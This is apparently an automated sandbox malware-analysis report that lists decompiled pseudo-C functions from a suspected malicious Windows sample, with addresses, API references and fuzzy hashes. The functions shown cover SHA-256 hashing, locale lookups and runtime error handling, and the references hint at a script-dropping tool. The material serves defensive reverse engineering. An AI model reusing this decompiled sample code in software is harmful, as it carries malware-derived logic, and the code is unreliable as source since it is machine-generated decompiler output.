                    					_t599[1] = (_t202 ^ _t203 ^ _t553 >> 0x0000000a) + (_t204 ^ _t205 ^ _t294 >> 0x00000003) +  *((intOrPtr*)(_t599 - 0x3c)) +  *((intOrPtr*)(_t599 - 0x18));
                    				} while ( *_t12 != 0);
                    				 *(_t603 + 0x30) =  *(_t603 + 0x30) & 0x00000000;
                    				_t558 =  *(_t603 + 0x50);
                    				_t600 =  *(_t603 + 0x14);
                    				 *(_t603 + 0x28) =  *(_t603 + 0x40);
                    				 *(_t603 + 0x1c) =  *(_t603 + 0x4c);
                    				 *(_t603 + 0x20) =  *(_t603 + 0x3c);
                    				 *(_t603 + 0x1c) =  *(_t603 + 0x48);
                    				_t208 =  *(_t603 + 0x48);
                    				 *(_t603 + 0x28) =  *(_t603 + 0x38);
                    				_t296 = 2;
                    				 *(_t603 + 0x10) =  *(_t603 + 0x48);
                    				 *(_t603 + 0x2c) =  *(_t603 + 0x38);
                    				do {
                    					_t400 = 0x19;
                    					_t209 = E0043329A(_t208, _t400);
                    					_t401 = 0xb;
                    					_t210 = E0043329A( *(_t603 + 0x10), _t401);
                    					_t402 = 6;
                    					_t211 = E0043329A( *(_t603 + 0x10), _t402);
                    					_t212 =  *(_t603 + 0x30);
                    					_t41 = _t212 + 0x46b390; // 0x428a2f98
                    					_t501 = (_t209 ^ _t210 ^ _t211) + (( *(_t603 + 0x18) ^  *(_t603 + 0x1c)) &  *(_t603 + 0x10) ^  *(_t603 + 0x1c)) +  *_t41 +  *((intOrPtr*)(_t603 +  *(_t603 + 0x30) + 0x58)) + _t558;
                    					 *(_t603 + 0x2c) =  *(_t603 + 0x2c) + _t501;
                    					_t403 = 0x16;
                    					_t213 = E0043329A( *(_t603 + 0x2c), _t403);
                    					_t404 = 0xd;
                    					_t214 = E0043329A( *(_t603 + 0x2c), _t404);
                    					_t215 = E0043329A( *(_t603 + 0x2c), _t296);
                    					_t563 =  *(_t603 + 0x28);
                    					 *(_t603 + 0x14) = (( *(_t603 + 0x24) |  *(_t603 + 0x2c)) &  *(_t603 + 0x20) |  *(_t603 + 0x24) &  *(_t603 + 0x2c)) + (_t213 ^ _t214 ^ _t215) + _t501;
                    					_t406 = 0x19;
                    					_t218 = E0043329A(_t563, _t406);
                    					_t407 = 0xb;
                    					_t219 = E0043329A(_t563, _t407);
                    					_t408 = 6;
                    					_t220 = E0043329A(_t563, _t408);
                    					_t221 =  *(_t603 + 0x30);
                    					_t59 = _t221 + 0x46b394; // 0x71374491
                    					_t508 = (_t218 ^ _t219 ^ _t220) + (( *(_t603 + 0x18) ^  *(_t603 + 0x10)) & _t563 ^  *(_t603 + 0x18)) +  *_t59 +  *((intOrPtr*)(_t603 +  *(_t603 + 0x30) + 0x5c)) +  *(_t603 + 0x20);
                    					 *(_t603 + 0x24) =  *(_t603 + 0x24) + _t508;
                    					_t409 = 0x16;
                    					_t222 = E0043329A( *(_t603 + 0x14), _t409);
                    					_t410 = 0xd;
                    					_t223 = E0043329A( *(_t603 + 0x14), _t410);
                    					_t224 = E0043329A( *(_t603 + 0x14), _t296);
                    					_t568 =  *(_t603 + 0x20);
                    					 *(_t603 + 0x20) = (( *(_t603 + 0x2c) |  *(_t603 + 0x14)) &  *(_t603 + 0x24) |  *(_t603 + 0x2c) &  *(_t603 + 0x14)) + (_t222 ^ _t223 ^ _t224) + _t508;
                    					_t417 = 0x19;
                    					_t227 = E0043329A(_t568, _t417);
                    					_t418 = 0xb;
                    					_t228 = E0043329A(_t568, _t418);
                    					_t419 = 6;
                    					_t229 = E0043329A(_t568, _t419);
                    					_t230 =  *(_t603 + 0x30);
                    					_t78 = _t230 + 0x46b398; // 0xb5c0fbcf
                    					_t515 = (_t227 ^ _t228 ^ _t229) + (( *(_t603 + 0x28) ^  *(_t603 + 0x10)) & _t568 ^  *(_t603 + 0x10)) +  *_t78 +  *((intOrPtr*)(_t603 +  *(_t603 + 0x30) + 0x60)) +  *(_t603 + 0x1c);
                    					 *(_t603 + 0x28) =  *(_t603 + 0x28) + _t515;
                    					_t420 = 0x16;
                    					_t231 = E0043329A( *(_t603 + 0x1c), _t420);
                    					_t421 = 0xd;
                    					_t232 = E0043329A( *(_t603 + 0x1c), _t421);
                    					_t233 = E0043329A( *(_t603 + 0x1c), _t296);
                    					_t573 =  *(_t603 + 0x24);
                    					 *(_t603 + 0x1c) = (( *(_t603 + 0x14) |  *(_t603 + 0x1c)) &  *(_t603 + 0x2c) |  *(_t603 + 0x14) &  *(_t603 + 0x1c)) + (_t231 ^ _t232 ^ _t233) + _t515;
                    					_t428 = 0x19;
                    					_t236 = E0043329A(_t573, _t428);
                    					_t429 = 0xb;
                    					_t237 = E0043329A(_t573, _t429);
                    					_t430 = 6;
                    					_t238 = E0043329A(_t573, _t430);
                    					_t239 =  *(_t603 + 0x30);
                    					_t97 = _t239 + 0x46b39c; // 0xe9b5dba5
                    					_t522 = (_t236 ^ _t237 ^ _t238) + (( *(_t603 + 0x20) ^  *(_t603 + 0x28)) & _t573 ^  *(_t603 + 0x28)) +  *_t97 +  *((intOrPtr*)(_t603 +  *(_t603 + 0x30) + 0x64)) +  *(_t603 + 0x14);
                    					 *(_t603 + 0x30) =  *(_t603 + 0x30) + _t522;
                    					_t431 = 0x16;
                    					_t240 = E0043329A( *(_t603 + 0x18), _t431);
                    					_t432 = 0xd;
                    					_t241 = E0043329A( *(_t603 + 0x18), _t432);
                    					_t242 = E0043329A( *(_t603 + 0x18), _t296);
                    					_t578 =  *(_t603 + 0x2c);
                    					 *(_t603 + 0x14) = (( *(_t603 + 0x18) |  *(_t603 + 0x1c)) &  *(_t603 + 0x14) |  *(_t603 + 0x18) &  *(_t603 + 0x1c)) + (_t240 ^ _t241 ^ _t242) + _t522;
                    					_t439 = 0x19;
                    					_t245 = E0043329A(_t578, _t439);
                    					_t440 = 0xb;
                    					_t246 = E0043329A(_t578, _t440);
                    					_t441 = 6;
                    					_t247 = E0043329A(_t578, _t441);
                    					_t248 =  *(_t603 + 0x30);
                    					_t116 = _t248 + 0x46b3a0; // 0x3956c25b
                    					_t529 = (_t245 ^ _t246 ^ _t247) + (( *(_t603 + 0x20) ^  *(_t603 + 0x24)) & _t578 ^  *(_t603 + 0x20)) +  *_t116 +  *((intOrPtr*)(_t603 +  *(_t603 + 0x30) + 0x68)) +  *(_t603 + 0x2c);
                    					_t250 =  *(_t603 + 0x18) + _t529;
                    					_t442 = 0x16;
                    					 *(_t603 + 0x14) = _t250;
                    					 *(_t603 + 0x50) = _t250;
                    					_t251 = E0043329A( *(_t603 + 0x10), _t442);
                    					_t443 = 0xd;
                    					_t252 = E0043329A( *(_t603 + 0x10), _t443);
                    					_t449 = (( *(_t603 + 0x18) |  *(_t603 + 0x10)) &  *(_t603 + 0x1c) |  *(_t603 + 0x18) &  *(_t603 + 0x10)) + (_t251 ^ _t252 ^ E0043329A( *(_t603 + 0x10), _t296)) + _t529;
                    					_t583 =  *(_t603 + 0x14);
                    					 *(_t603 + 0x2c) = _t449;
                    					 *(_t603 + 0x44) = _t449;
                    					_t450 = 0x19;
                    					_t256 = E0043329A(_t583, _t450);
                    					_t451 = 0xb;
                    					_t257 = E0043329A(_t583, _t451);
                    					_t452 = 6;
                    					_t258 = E0043329A(_t583, _t452);
                    					_t259 =  *(_t603 + 0x30);
                    					_t137 = _t259 + 0x46b3a4; // 0x59f111f1
                    					_t536 = (_t256 ^ _t257 ^ _t258) + (( *(_t603 + 0x24) ^  *(_t603 + 0x2c)) & _t583 ^  *(_t603 + 0x24)) +  *_t137 +  *((intOrPtr*)(_t603 +  *(_t603 + 0x30) + 0x6c)) +  *(_t603 + 0x24);
                    					_t261 =  *(_t603 + 0x20) + _t536;
                    					_t453 = 0x16;
                    					 *(_t603 + 0x1c) = _t261;
                    					 *(_t603 + 0x4c) = _t261;
                    					_t262 = E0043329A( *(_t603 + 0x28), _t453);
                    					_t454 = 0xd;
                    					_t263 = E0043329A( *(_t603 + 0x28), _t454);
                    					_t460 = (( *(_t603 + 0x28) |  *(_t603 + 0x10)) &  *(_t603 + 0x18) |  *(_t603 + 0x28) &  *(_t603 + 0x10)) + (_t262 ^ _t263 ^ E0043329A( *(_t603 + 0x28), _t296)) + _t536;
                    					_t588 =  *(_t603 + 0x1c);
                    					 *(_t603 + 0x24) = _t460;
                    					 *(_t603 + 0x40) = _t460;
                    					_t461 = 0x19;
                    					_t267 = E0043329A(_t588, _t461);
                    					_t462 = 0xb;
                    					_t268 = E0043329A(_t588, _t462);
                    					_t463 = 6;
                    					_t269 = E0043329A(_t588, _t463);
                    					_t157 =  *(_t603 + 0x30) + 0x46b3a8; // 0x923f82a4
                    					_t543 = (_t267 ^ _t268 ^ _t269) + (( *(_t603 + 0x2c) ^  *(_t603 + 0x14)) & _t588 ^  *(_t603 + 0x2c)) +  *_t157 +  *((intOrPtr*)(_t603 +  *(_t603 + 0x30) + 0x6c)) +  *(_t603 + 0x24);
                    					_t272 =  *(_t603 + 0x18) + _t543;
                    					_t464 = 0x16;
                    					 *(_t603 + 0x18) = _t272;
                    					 *(_t603 + 0x48) = _t272;
                    					_t273 = E0043329A( *(_t603 + 0x20), _t464);
                    					_t465 = 0xd;
                    					_t274 = E0043329A( *(_t603 + 0x20), _t465);
                    					_t471 = (( *(_t603 + 0x20) |  *(_t603 + 0x28)) &  *(_t603 + 0x10) |  *(_t603 + 0x20) &  *(_t603 + 0x28)) + (_t273 ^ _t274 ^ E0043329A( *(_t603 + 0x20), _t296)) + _t543;
                    					_t593 =  *(_t603 + 0x18);
                    					 *(_t603 + 0x28) = _t471;
                    					 *(_t603 + 0x3c) = _t471;
                    					_t472 = 0x19;
                    					_t278 = E0043329A(_t593, _t472);
                    					_t473 = 0xb;
                    					_t279 = E0043329A(_t593, _t473);
                    					_t474 = 6;
                    					_t280 = E0043329A(_t593, _t474);
                    					_t281 =  *(_t603 + 0x30);
                    					_t179 = _t281 + 0x46b3ac; // 0xab1c5ed5
                    					_t550 = (_t278 ^ _t279 ^ _t280) + (( *(_t603 + 0x14) ^  *(_t603 + 0x1c)) & _t593 ^  *(_t603 + 0x14)) +  *_t179 +  *((intOrPtr*)(_t603 +  *(_t603 + 0x30) + 0x74)) +  *(_t603 + 0x30);
                    					_t283 =  *(_t603 + 0x14) + _t550;
                    					_t475 = 0x16;
                    					 *(_t603 + 0x10) = _t283;
                    					 *(_t603 + 0x44) = _t283;
                    					_t284 = E0043329A( *(_t603 + 0x24), _t475);
                    					_t476 = 0xd;
                    					_t285 = E0043329A( *(_t603 + 0x24), _t476);
                    					_t482 = (( *(_t603 + 0x20) |  *(_t603 + 0x24)) &  *(_t603 + 0x28) |  *(_t603 + 0x20) &  *(_t603 + 0x24)) + (_t284 ^ _t285 ^ E0043329A( *(_t603 + 0x24), _t296)) + _t550;
                    					_t558 =  *(_t603 + 0x14);
                    					_t290 =  *(_t603 + 0x30) + 0x20;
                    					 *(_t603 + 0x30) = _t290;
                    					_t208 =  *(_t603 + 0x10);
                    					 *(_t603 + 0x2c) = _t482;
                    					 *(_t603 + 0x34) = _t482;
                    				} while (_t290 < 0x100);
                    				do {
                    					asm("movups xmm0, [ebp]");
                    					asm("movups xmm1, [eax+ebp]");
                    					asm("paddd xmm1, xmm0");
                    					asm("movups [ebp], xmm1");
                    					_t600 = _t600 + 0x10;
                    					_t296 = _t296 - 1;
                    				} while (_t296 != 0);
                    				return 0;
                    			}


































































































































                    0x00433364
                    0x00433370
                    0x0043337a
                    0x0043337d
                    0x00433385
                    0x00433385
                    0x00433387
                    0x00433390
                    0x00433390
                    0x00433392
                    0x00433399
                    0x00433399
                    0x0043339e
                    0x004333a3
                    0x004333a4
                    0x004333ab
                    0x004333b0
                    0x004333bc
                    0x004333c1
                    0x004333c8
                    0x004333cd
                    0x004333d9
                    0x004333e4
                    0x004333e4
                    0x004333e9
                    0x004333e9
                    0x004333f6
                    0x004333fb
                    0x004333ff
                    0x00433403
                    0x0043340b
                    0x00433413
                    0x0043341d
                    0x00433421
                    0x00433425
                    0x0043342d
                    0x0043342e
                    0x00433432
                    0x00433436
                    0x00433438
                    0x0043343b
                    0x00433448
                    0x00433449
                    0x00433456
                    0x00433457
                    0x0043346a
                    0x0043347a
                    0x00433484
                    0x00433486
                    0x0043348a
                    0x0043348b
                    0x00433498
                    0x00433499
                    0x004334a6
                    0x004334c5
                    0x004334c9
                    0x004334d1
                    0x004334d2
                    0x004334d9
                    0x004334de
                    0x004334e5
                    0x004334ea
                    0x004334f9
                    0x0043350b
                    0x00433515
                    0x00433519
                    0x0043351d
                    0x0043351e
                    0x00433527
                    0x0043352c
                    0x00433539
                    0x00433558
                    0x0043355e
                    0x00433564
                    0x00433565
                    0x0043356c
                    0x00433571
                    0x00433578
                    0x0043357d
                    0x0043358c
                    0x0043359e
                    0x004335a8
                    0x004335ac
                    0x004335b0
                    0x004335b1
                    0x004335be
                    0x004335bf
                    0x004335cc
                    0x004335eb
                    0x004335f1
                    0x004335f7
                    0x004335f8
                    0x004335ff
                    0x00433604
                    0x0043360b
                    0x00433610
                    0x0043361f
                    0x00433631
                    0x0043363b
                    0x0043363f
                    0x00433643
                    0x00433644
                    0x00433651
                    0x00433652
                    0x0043365f
                    0x0043367e
                    0x00433684
                    0x0043368a
                    0x0043368b
                    0x00433692
                    0x00433697
                    0x0043369e
                    0x004336a3
                    0x004336b2
                    0x004336c4
                    0x004336d2
                    0x004336d6
                    0x004336d8
                    0x004336d9
                    0x004336dd
                    0x004336e1
                    0x004336ee
                    0x004336ef
                    0x00433719
                    0x0043371b
                    0x00433721
                    0x00433727
                    0x0043372b
                    0x0043372c
                    0x00433733
                    0x00433738
                    0x0043373f
                    0x00433744
                    0x00433753
                    0x00433765
                    0x00433773
                    0x00433777
                    0x00433779
                    0x0043377a
                    0x0043377e
                    0x00433782
                    0x0043378f
                    0x00433790
                    0x004337ba
                    0x004337bc
                    0x004337c2
                    0x004337c8
                    0x004337cc
                    0x004337cd
                    0x004337d4
                    0x004337d9
                    0x004337e0
                    0x004337e5
                    0x00433800
                    0x0043380e
                    0x00433816
                    0x0043381a
                    0x0043381b
                    0x0043381f
                    0x00433823
                    0x00433830
                    0x00433831
                    0x0043385b
                    0x0043385d
                    0x00433863
                    0x00433869
                    0x0043386d
                    0x0043386e
                    0x00433875
                    0x0043387a
                    0x00433881
                    0x00433886
                    0x00433895
                    0x004338a7
                    0x004338b5
                    0x004338b9
                    0x004338bb
                    0x004338bc
                    0x004338c0
                    0x004338c4
                    0x004338d1
                    0x004338d2
                    0x004338fc
                    0x00433902
                    0x00433906
                    0x00433909
                    0x00433912
                    0x00433916
                    0x0043391a
                    0x0043391a
                    0x0043392a
                    0x0043392a
                    0x0043392e
                    0x00433932
                    0x00433936
                    0x0043393a
                    0x0043393d
                    0x0043393d
                    0x0043394e

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0
                    • API String ID: 0-4108050209
                    • Opcode ID: 3de4e0988032ceff79866560269df6b3f5abb151035cf48f95182398a46bada9
                    • Instruction ID: 3bc0b529299f1e13c2b364b2dccb2b5c3998933018477b723211478212b80ca1
                    • Opcode Fuzzy Hash: 3de4e0988032ceff79866560269df6b3f5abb151035cf48f95182398a46bada9
                    • Instruction Fuzzy Hash: 29126F327083008BD714DF65D851A1FB3E2BFCC718F16896EF489A7381DA74E9568B86
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 59%
                    			E00451D23(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                    				signed int _v8;
                    				short _v248;
                    				void* __ebp;
                    				signed int _t16;
                    				signed int _t22;
                    				void* _t24;
                    				void* _t31;
                    				void* _t35;
                    				signed int* _t50;
                    				int _t53;
                    				signed int _t54;
                    
                    				_t16 =  *0x47000c; // 0xc3a97826
                    				_v8 = _t16 ^ _t54;
                    				_t35 = E00447C05(__ebx, __ecx, __edx);
                    				_t50 =  *(E00447C05(_t35, __ecx, __edx) + 0x34c);
                    				_t53 = E00451DFB(_a4);
                    				asm("sbb ecx, ecx");
                    				_t22 = GetLocaleInfoW(_t53, ( ~( *(_t35 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
                    				if(_t22 != 0) {
                    					_t24 = E00453424(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
                    					if(_t24 != 0) {
                    						if( *(_t35 + 0x60) == 0 &&  *((intOrPtr*)(_t35 + 0x5c)) != 0) {
                    							_t31 = E00453424(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
                    							if(_t31 == 0) {
                    								_push(_t50);
                    								_push(_t31);
                    								goto L9;
                    							}
                    						}
                    					} else {
                    						if( *(_t35 + 0x60) != _t24) {
                    							L10:
                    							 *_t50 =  *_t50 | 0x00000004;
                    							_t50[1] = _t53;
                    							_t50[2] = _t53;
                    						} else {
                    							_push(_t50);
                    							_push(1);
                    							L9:
                    							_push(_t53);
                    							if(E00451F53(_t35) != 0) {
                    								goto L10;
                    							}
                    						}
                    					}
                    				} else {
                    					 *_t50 =  *_t50 & _t22;
                    				}
                    				return E004349BB(_v8 ^ _t54);
                    			}














                    0x00451d2e
                    0x00451d35
                    0x00451d43
                    0x00451d4b
                    0x00451d5a
                    0x00451d66
                    0x00451d77
                    0x00451d7f
                    0x00451d90
                    0x00451d99
                    0x00451da9
                    0x00451dbb
                    0x00451dc4
                    0x00451dc6
                    0x00451dc7
                    0x00000000
                    0x00451dc7
                    0x00451dc4
                    0x00451d9b
                    0x00451d9e
                    0x00451dd5
                    0x00451dd5
                    0x00451dd8
                    0x00451ddb
                    0x00451da0
                    0x00451da0
                    0x00451da1
                    0x00451dc8
                    0x00451dc8
                    0x00451dd3
                    0x00000000
                    0x00000000
                    0x00451dd3
                    0x00451d9e
                    0x00451d81
                    0x00451d81
                    0x00451d83
                    0x00451df8

                    APIs
                      • Part of subcall function 00447C05: GetLastError.KERNEL32(?,00000000,00441655,?,0041B448,-00475D04,?,?,?,?,0046B928,0040D016,.vbs), ref: 00447C09
                      • Part of subcall function 00447C05: _free.LIBCMT ref: 00447C3C
                      • Part of subcall function 00447C05: SetLastError.KERNEL32(00000000,?,0041B448,-00475D04,?,?,?,?,0046B928,0040D016,.vbs), ref: 00447C7D
                      • Part of subcall function 00447C05: _abort.LIBCMT ref: 00447C83
                      • Part of subcall function 00447C05: _free.LIBCMT ref: 00447C64
                      • Part of subcall function 00447C05: SetLastError.KERNEL32(00000000,?,0041B448,-00475D04,?,?,?,?,0046B928,0040D016,.vbs), ref: 00447C71
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00451D77
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free$InfoLocale_abort
                    • String ID:
                    • API String ID: 1663032902-0
                    • Opcode ID: f88e38d2c1cc07658d861a5f27bd31f183cab05a412712512da0d6b3c7e4922b
                    • Instruction ID: fcb5c6192372bca14f6dfa2077540dd55ed9fe6eaed7575afd0b4424cbe71fb1
                    • Opcode Fuzzy Hash: f88e38d2c1cc07658d861a5f27bd31f183cab05a412712512da0d6b3c7e4922b
                    • Instruction Fuzzy Hash: 2B21A132500206ABDB249E26DC82BBA73B8EF05316F10017BFD01D6252EB38AD49C758
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E00451F53(void* __ebx, signed int _a4, intOrPtr _a8) {
                    				short _v8;
                    				void* __ecx;
                    				void* __ebp;
                    				void* _t8;
                    				void* _t12;
                    				intOrPtr _t13;
                    				void* _t16;
                    				void* _t20;
                    				void* _t22;
                    				void* _t24;
                    				signed int _t27;
                    				intOrPtr* _t29;
                    
                    				_push(_t16);
                    				_t8 = E00447C05(__ebx, _t16, _t22);
                    				_t27 = _a4;
                    				_t24 = _t8;
                    				if(GetLocaleInfoW(_t27 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) != 0) {
                    					if(_t27 == _v8 || _a8 == 0) {
                    						L7:
                    						_t12 = 1;
                    					} else {
                    						_t29 =  *((intOrPtr*)(_t24 + 0x50));
                    						_t20 = _t29 + 2;
                    						do {
                    							_t13 =  *_t29;
                    							_t29 = _t29 + 2;
                    						} while (_t13 != 0);
                    						if(E00451AA7( *((intOrPtr*)(_t24 + 0x50))) == _t29 - _t20 >> 1) {
                    							goto L1;
                    						} else {
                    							goto L7;
                    						}
                    					}
                    				} else {
                    					L1:
                    					_t12 = 0;
                    				}
                    				return _t12;
                    			}















                    0x00451f58
                    0x00451f5b
                    0x00451f60
                    0x00451f63
                    0x00451f87
                    0x00451f90
                    0x00451fba
                    0x00451fbc
                    0x00451f98
                    0x00451f98
                    0x00451f9b
                    0x00451f9e
                    0x00451f9e
                    0x00451fa1
                    0x00451fa4
                    0x00451fb8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00451fb8
                    0x00451f89
                    0x00451f89
                    0x00451f89
                    0x00451f89
                    0x00451fc2

                    APIs
                      • Part of subcall function 00447C05: GetLastError.KERNEL32(?,00000000,00441655,?,0041B448,-00475D04,?,?,?,?,0046B928,0040D016,.vbs), ref: 00447C09
                      • Part of subcall function 00447C05: _free.LIBCMT ref: 00447C3C
                      • Part of subcall function 00447C05: SetLastError.KERNEL32(00000000,?,0041B448,-00475D04,?,?,?,?,0046B928,0040D016,.vbs), ref: 00447C7D
                      • Part of subcall function 00447C05: _abort.LIBCMT ref: 00447C83
                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451CF1,00000000,00000000,?), ref: 00451F7F
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$InfoLocale_abort_free
                    • String ID:
                    • API String ID: 2692324296-0
                    • Opcode ID: 44d3f4d5c1bb237cc06049f31b1431994422bfe3bcb7bbc17b1cf7c6c18090d7
                    • Instruction ID: 21a51d457acd70b8ca37b666724f3b6df95ad47f0be507cf42c198208af91ac5
                    • Opcode Fuzzy Hash: 44d3f4d5c1bb237cc06049f31b1431994422bfe3bcb7bbc17b1cf7c6c18090d7
                    • Instruction Fuzzy Hash: 92F04933A00116BBDB285A608805BBB7759EB40319F14452AEC05A3251EB38FD45C6D4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			E00447DF4(void* __eflags) {
                    				int _t15;
                    				void* _t28;
                    
                    				E00434800(0x46da70, 0xc);
                    				 *(_t28 - 0x1c) =  *(_t28 - 0x1c) & 0x00000000;
                    				E0044527A( *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)))));
                    				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
                    				 *0x471738 = E00447EA0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t28 + 0xc)))))));
                    				_t15 = EnumSystemLocalesW(E00447DAE, 1);
                    				_push(0x20);
                    				asm("ror eax, cl");
                    				 *0x471738 = 0 ^  *0x47000c;
                    				 *(_t28 - 0x1c) = _t15;
                    				 *(_t28 - 4) = 0xfffffffe;
                    				E00447E6C();
                    				return E00434846();
                    			}





                    0x00447dfb
                    0x00447e00
                    0x00447e09
                    0x00447e0f
                    0x00447e20
                    0x00447e2c
                    0x00447e3c
                    0x00447e43
                    0x00447e4b
                    0x00447e50
                    0x00447e53
                    0x00447e5a
                    0x00447e66

                    APIs
                      • Part of subcall function 0044527A: EnterCriticalSection.KERNEL32(-00061F13,?,004429BB,00000000,0046D8C8,0000000C,00442976,?,?,?,00445518,?,?,00447CBA,00000001,00000364), ref: 00445289
                    • EnumSystemLocalesW.KERNEL32(00447DAE,00000001,0046DA70,0000000C), ref: 00447E2C
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalEnterEnumLocalesSectionSystem
                    • String ID:
                    • API String ID: 1272433827-0
                    • Opcode ID: 514d24490a3f7789e439db612d42e3d8824e4acee8e836efdbf62d521e214a91
                    • Instruction ID: 8068a56e04551d33229b62f8e791e1760d7953f07b82a80af14475778d239da9
                    • Opcode Fuzzy Hash: 514d24490a3f7789e439db612d42e3d8824e4acee8e836efdbf62d521e214a91
                    • Instruction Fuzzy Hash: D1F04F76A10200EFEB04EF69E846B9D37E0EB04724F20416AF414DB2A1DB7899808B5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00451960(void* __ecx, void* __edx, signed char* _a4) {
                    				void* __ebp;
                    				intOrPtr _t9;
                    				signed char* _t13;
                    				void* _t14;
                    				intOrPtr* _t16;
                    				void* _t20;
                    				void* _t22;
                    
                    				_t20 = E00447C05(_t14, __ecx, __edx);
                    				_t16 =  *((intOrPtr*)(_t20 + 0x54));
                    				_t22 = _t16 + 2;
                    				do {
                    					_t9 =  *_t16;
                    					_t16 = _t16 + 2;
                    				} while (_t9 != 0);
                    				 *(_t20 + 0x64) = 0 | _t16 - _t22 >> 0x00000001 == 0x00000003;
                    				EnumSystemLocalesW(0x4518b7, 1);
                    				_t13 = _a4;
                    				if(( *_t13 & 0x00000004) == 0) {
                    					 *_t13 = 0;
                    					return _t13;
                    				}
                    				return _t13;
                    			}










                    0x0045196c
                    0x00451970
                    0x00451973
                    0x00451976
                    0x00451976
                    0x00451979
                    0x0045197c
                    0x00451994
                    0x00451997
                    0x0045199d
                    0x004519a3
                    0x004519a5
                    0x00000000
                    0x004519a5
                    0x004519aa

                    APIs
                      • Part of subcall function 00447C05: GetLastError.KERNEL32(?,00000000,00441655,?,0041B448,-00475D04,?,?,?,?,0046B928,0040D016,.vbs), ref: 00447C09
                      • Part of subcall function 00447C05: _free.LIBCMT ref: 00447C3C
                      • Part of subcall function 00447C05: SetLastError.KERNEL32(00000000,?,0041B448,-00475D04,?,?,?,?,0046B928,0040D016,.vbs), ref: 00447C7D
                      • Part of subcall function 00447C05: _abort.LIBCMT ref: 00447C83
                    • EnumSystemLocalesW.KERNEL32(004518B7,00000001,?,?,?,00452122,^DD,?,?,?,?,?,0044445E,?,?,?), ref: 00451997
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                    • String ID:
                    • API String ID: 1084509184-0
                    • Opcode ID: 784a1f4f5783f06069887e786c00a90aa1ef699a9926ed4e1852fc64433d8137
                    • Instruction ID: 3d022cfd71dffa281093cca1e37360b12a3eb13daa5f804eddd078370c196e22
                    • Opcode Fuzzy Hash: 784a1f4f5783f06069887e786c00a90aa1ef699a9926ed4e1852fc64433d8137
                    • Instruction Fuzzy Hash: E2F0D53A30034083DB04AF35C805F2ABF80EFC2316F06005EEE058B6A2CA398802C398
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E0040F6DA(void* __ecx) {
                    				char _v8;
                    				void* __ebp;
                    				void* _t8;
                    				void* _t11;
                    				void* _t13;
                    				void* _t15;
                    
                    				_push(__ecx);
                    				_t13 = __ecx;
                    				GetLocaleInfoA(0x800, 0x5a,  &_v8, 3);
                    				E00402093(_t8, _t13, _t11, _t15,  &_v8);
                    				return _t13;
                    			}









                    0x0040f6dd
                    0x0040f6e4
                    0x0040f6ee
                    0x0040f6fa
                    0x0040f705

                    APIs
                    • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415109,00473EC8,004749E8,00473EC8,00000000,00473EC8,00000000,00473EC8,4.8.0 Pro), ref: 0040F6EE
                    Memory Dump Source
